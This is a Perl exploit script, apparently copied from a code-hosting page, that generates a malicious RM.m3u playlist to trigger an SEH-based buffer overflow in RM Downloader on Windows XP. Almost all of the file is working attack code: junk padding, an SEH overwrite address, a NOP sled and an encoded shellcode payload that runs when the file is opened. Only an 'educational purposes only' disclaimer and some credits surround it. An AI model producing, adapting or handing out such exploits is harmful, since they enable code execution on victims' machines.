41 lines
No EOL
1.6 KiB
Perl
Executable file
41 lines
No EOL
1.6 KiB
Perl
Executable file
#!/usr/bin/perl -w
|
|
# Author: Jacky
|
|
# Version: 3.0.2.1
|
|
# Tested on: Windows XP SP2
|
|
|
|
#RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )
|
|
#Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
|
|
#Written by Jacky
|
|
#All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
|
|
#I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct
|
|
#Ret Vulnerability , so i tried by SEH and Voila !
|
|
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!
|
|
|
|
my $file="RM.m3u";
|
|
my $junk="A"x35059;
|
|
my $nseh="\xeb\x1e\x90\x90";
|
|
my $seh="\x1F\xEA\x02\x10"; # 0x1002EA1F::> Thanks for Peter who gave me this
|
|
#address and it worked Perfectly ;-)
|
|
#This Address works too ::> 0x01DD1111
|
|
my $nops="\x90"x25;
|
|
my $esp="\xbf\x1b\xaf\xd9\xd2\x2b\xc9\xb1\x24\xdb\xda\xd9\x74\x24\xf4\x5b".
|
|
"\x31\x7b\x0e\x83\xeb\xfc\x03\x60\xa5\x3b\x27\x6a\x51\xff\xc8\x92".
|
|
"\xa2\x8b\x8c\xae\x29\xf7\x0b\xb6\x2c\xe7\x9f\x09\x37\x7c\xc0\xb5".
|
|
"\x46\x69\xb6\x3e\x7c\xe6\x48\xae\x4c\x38\xd3\x82\x2b\x78\x90\xdd".
|
|
"\xf2\xb3\x54\xe0\x36\xa8\x93\xd9\xe2\x0b\x58\x68\xee\xdf\x3f\xb6".
|
|
"\xf1\x34\xd9\x3d\xfd\x81\xad\x1e\xe2\x14\x59\x2b\x06\x9c\x9c\xc0".
|
|
"\xbe\xfe\xba\x12\x02\xcf\x02\x7e\x0f\x70\xb3\xfb\xcf\x09\xbf\x88".
|
|
"\x90\xe5\x34\xfe\x0c\x5b\xc1\x96\x24\x48\xdf\xed\xb5\x3e\xe0\xf1".
|
|
"\xb5\xb5\x89\xcd\xea\xf8\xbf\x4d\x43\x72\xc7\x0e\xab\xff\x68\x78".
|
|
"\xdc\x8a\x8d\x27\x74\x13\x73\x5d\x8a\x74\x73\x86\xf0\x1b\xe7\x2b".
|
|
"\xd9\xbe\x8f\xce\x25";
|
|
|
|
my $junk2="A"x5000;
|
|
my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;
|
|
|
|
|
|
open(INI,">$file");
|
|
print INI $payload;
|
|
print "[+]File Created Successfully!\n";
|
|
print "[+]Done!\n";
|
|
close(INI); |